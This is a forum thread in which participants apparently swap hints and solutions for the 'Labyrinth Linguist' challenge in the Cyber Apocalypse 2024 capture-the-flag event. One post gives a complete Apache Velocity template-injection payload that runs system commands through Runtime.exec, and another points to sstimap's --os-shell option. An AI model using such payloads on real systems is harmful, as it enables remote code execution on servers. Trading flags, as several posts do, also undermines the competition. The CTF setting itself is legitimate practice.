Cyber Apocalypse 2024
by Bendelladj1 - Saturday March 9, 2024 at 02:05 PM
(Mar 13, 2024, 08:43 PM)kenadamsiu Wrote: Any hints on Labyrinth Linguist? Used millions XSS and nothing

SSTI in velocity template
Reply
(Mar 13, 2024, 08:46 PM)xemyll Wrote:
(Mar 13, 2024, 08:43 PM)kenadamsiu Wrote: Any hints on Labyrinth Linguist? Used millions XSS and nothing

SSTI in velocity template

${#include("/flag.txt")}... I did this but got error what I need to do specifically?
Reply
(Mar 13, 2024, 08:51 PM)kenadamsiu Wrote:
(Mar 13, 2024, 08:46 PM)xemyll Wrote:
(Mar 13, 2024, 08:43 PM)kenadamsiu Wrote: Any hints on Labyrinth Linguist? Used millions XSS and nothing

SSTI in velocity template

${#include("/flag.txt")}... I did this but got error what I need to do specifically?

well it more than one command we need setup local variable and use streams for command output . also flag name contains random string. can trade for easy problem: Were Pickle Phreaks, Testimonial, Crushing, Blunt, Rids
Reply
Any tips for Partial Tenacity (do not DM me, I'm after tips, not trades)? RSA decryption is done, but it looks like there is another step after that which I cannot figure out.
Reply
(Mar 13, 2024, 08:57 PM)xemyll Wrote:
(Mar 13, 2024, 08:51 PM)kenadamsiu Wrote:
(Mar 13, 2024, 08:46 PM)xemyll Wrote:
(Mar 13, 2024, 08:43 PM)kenadamsiu Wrote: Any hints on Labyrinth Linguist? Used millions XSS and nothing

SSTI in velocity template

${#include("/flag.txt")}... I did this but got error what I need to do specifically?

well it more than one command we need setup local variable and use streams for command output . also flag name contains random string. can trade for easy problem: Were Pickle Phreaks, Testimonial, Crushing, Blunt, Rids

I do not have them unfortunately I am new here, please help
Reply
(Mar 13, 2024, 09:04 PM)kenadamsiu Wrote:
(Mar 13, 2024, 08:57 PM)xemyll Wrote:
(Mar 13, 2024, 08:51 PM)kenadamsiu Wrote:
(Mar 13, 2024, 08:46 PM)xemyll Wrote:
(Mar 13, 2024, 08:43 PM)kenadamsiu Wrote: Any hints on Labyrinth Linguist? Used millions XSS and nothing

SSTI in velocity template

${#include("/flag.txt")}... I did this but got error what I need to do specifically?

well it more than one command we need setup local variable and use streams for command output . also flag name contains random string. can trade for easy problem: Were Pickle Phreaks, Testimonial, Crushing, Blunt, Rids

I do not have them unfortunately I am new here, please help

Read part related to RCE https://antgarsil.github.io/posts/velocity/
Reply
(Mar 13, 2024, 09:04 PM)kenadamsiu Wrote:
(Mar 13, 2024, 08:57 PM)xemyll Wrote:
(Mar 13, 2024, 08:51 PM)kenadamsiu Wrote:
(Mar 13, 2024, 08:46 PM)xemyll Wrote:
(Mar 13, 2024, 08:43 PM)kenadamsiu Wrote: Any hints on Labyrinth Linguist? Used millions XSS and nothing

SSTI in velocity template

${#include("/flag.txt")}... I did this but got error what I need to do specifically?

well it more than one command we need setup local variable and use streams for command output . also flag name contains random string. can trade for easy problem: Were Pickle Phreaks, Testimonial, Crushing, Blunt, Rids

I do not have them unfortunately I am new here, please help

https://github.com/vladko312/sstimap --os-shell will get you there
Reply
(Mar 13, 2024, 09:15 PM)xemyll Wrote:
(Mar 13, 2024, 09:04 PM)kenadamsiu Wrote:
(Mar 13, 2024, 08:57 PM)xemyll Wrote:
(Mar 13, 2024, 08:51 PM)kenadamsiu Wrote:
(Mar 13, 2024, 08:46 PM)xemyll Wrote: SSTI in velocity template

${#include("/flag.txt")}... I did this but got error what I need to do specifically?

well it more than one command we need setup local variable and use streams for command output . also flag name contains random string. can trade for easy problem: Were Pickle Phreaks, Testimonial, Crushing, Blunt, Rids

I do not have them unfortunately I am new here, please help

Read part related to RCE https://antgarsil.github.io/posts/velocity/

is this the answer #set($str=$class.inspect("java.lang.String").type) #set($chr=$class.inspect("java.lang.Character").type) #set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami")) $ex.waitFor() #set($out=$ex.getInputStream()) #foreach($i in [1..$out.available()]) $str.valueOf($chr.toChars($out.read())) #end
?
Reply
(Mar 13, 2024, 09:30 PM)kenadamsiu Wrote:
(Mar 13, 2024, 09:15 PM)xemyll Wrote:
(Mar 13, 2024, 09:04 PM)kenadamsiu Wrote:
(Mar 13, 2024, 08:57 PM)xemyll Wrote:
(Mar 13, 2024, 08:51 PM)kenadamsiu Wrote: ${#include("/flag.txt")}... I did this but got error what I need to do specifically?

well it more than one command we need setup local variable and use streams for command output . also flag name contains random string. can trade for easy problem: Were Pickle Phreaks, Testimonial, Crushing, Blunt, Rids

I do not have them unfortunately I am new here, please help

Read part related to RCE https://antgarsil.github.io/posts/velocity/

is this the answer #set($str=$class.inspect("java.lang.String").type) #set($chr=$class.inspect("java.lang.Character").type) #set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami")) $ex.waitFor() #set($out=$ex.getInputStream()) #foreach($i in [1..$out.available()]) $str.valueOf($chr.toChars($out.read())) #end
?

play a bit with .exec("whoami")
Reply
Looking for writeup for apexsurvive or percetron. Have basically everything else except ~10 challenges. DM me
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 602 91,754 4 hours ago
Last Post: sabero_exe
  [FREE] CPTS 12 FLAGS pulsebreaker 68 1,956 Today, 09:54 AM
Last Post: VictorPipeau
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 371 92,851 Today, 08:48 AM
Last Post: phannguyenbaouy1
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 21 2,620 Today, 05:08 AM
Last Post: popoler
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,271 Yesterday, 02:10 PM
Last Post: kkkato

Forum Jump:


 Users browsing this forum: 1 Guest(s)